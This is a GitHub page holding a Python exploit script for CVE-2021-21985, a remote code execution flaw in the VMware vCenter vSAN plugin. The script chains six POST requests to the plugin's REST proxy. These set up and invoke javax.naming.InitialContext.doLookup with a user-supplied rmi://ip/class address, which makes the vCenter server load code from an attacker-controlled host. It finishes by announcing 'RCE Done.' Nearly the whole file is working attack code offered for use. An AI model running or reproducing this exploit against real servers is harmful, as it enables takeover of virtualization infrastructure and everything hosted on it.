forked from r0ckysec/CVE-2021-21985
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2021-21985_exp.py
129 lines (89 loc) · 3.64 KB
/
CVE-2021-21985_exp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: r0cky
@Time: 2021/6/3-16:57
"""
import sys
from urllib.parse import urlparse
import json
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def banner():
print("""
==============================================================
_____ _ _____ _____ ______
/ ____| | | | __ \ / ____| ____|
__ _| | ___ _ __ | |_ ___ _ __ | |__) | | | |__
\ \ / / | / _ \ '_ \| __/ _ \ '__| | _ /| | | __|
\ V /| |___| __/ | | | || __/ | | | \ \| |____| |____
\_/ \_____\___|_| |_|\__\___|_| |_| \_\\_____|______|
Powered by r0cky Team ZionLab
==============================================================
""")
def payload1(url):
print ("[*] Step 1 setTargetObject to null ...")
target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetObject"
data = {"methodInput":[None]}
r = requests.post(target, data=json.dumps(data), headers=headers, verify=False)
if "result" in r.json():
payload2(url)
else:
print ("[-] send payload failed.")
def payload2(url):
print("[*] Step 2 setStaticMethod to payload ...")
target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setStaticMethod"
data = {"methodInput": ["javax.naming.InitialContext.doLookup"]}
r = requests.post(target, data=json.dumps(data), headers=headers, verify=False)
if "result" in r.json():
payload3(url)
else:
print ("[-] send payload failed.")
def payload3(url):
print("[*] Step 3 setTargetMethod to doLookup ...")
target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setTargetMethod"
data = {"methodInput": ["doLookup"]}
r = requests.post(target, data=json.dumps(data), headers=headers, verify=False)
if "result" in r.json():
payload4(url)
else:
print ("[-] send payload failed.")
def payload4(url):
print("[*] Step 4 setArguments with payload args ...")
target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/setArguments"
data = {"methodInput": [[rmi_class]]}
r = requests.post(target, data=json.dumps(data), headers=headers, verify=False)
if "result" in r.json():
payload5(url)
else:
print ("[-] send payload failed.")
def payload5(url):
print("[*] Step 5 initial payload class and methods ...")
target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/prepare"
data = {"methodInput": [None]}
r = requests.post(target, data=json.dumps(data), headers=headers, verify=False)
if "result" in r.json():
payload6(url)
else:
print ("[-] send payload failed.")
def payload6(url):
print("[*] Step 6 trigger method invoke ...")
target = url + "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper/invoke"
data = {"methodInput": [None]}
r = requests.post(target, data=json.dumps(data), headers=headers, verify=False)
print("[+] send payload success.")
print()
print("[END] VMWare vCenter RCE Done.")
headers = {"Content-Type": "application/json"}
if __name__ == '__main__':
banner()
try:
target = sys.argv[1]
rmi_class = sys.argv[2]
up = urlparse(target)
target = up.scheme + "://" + up.netloc
payload1(target)
except:
print("Example: \n\tpython3 " + sys.argv[
0] + " <target> <rmi://ip/class>\n")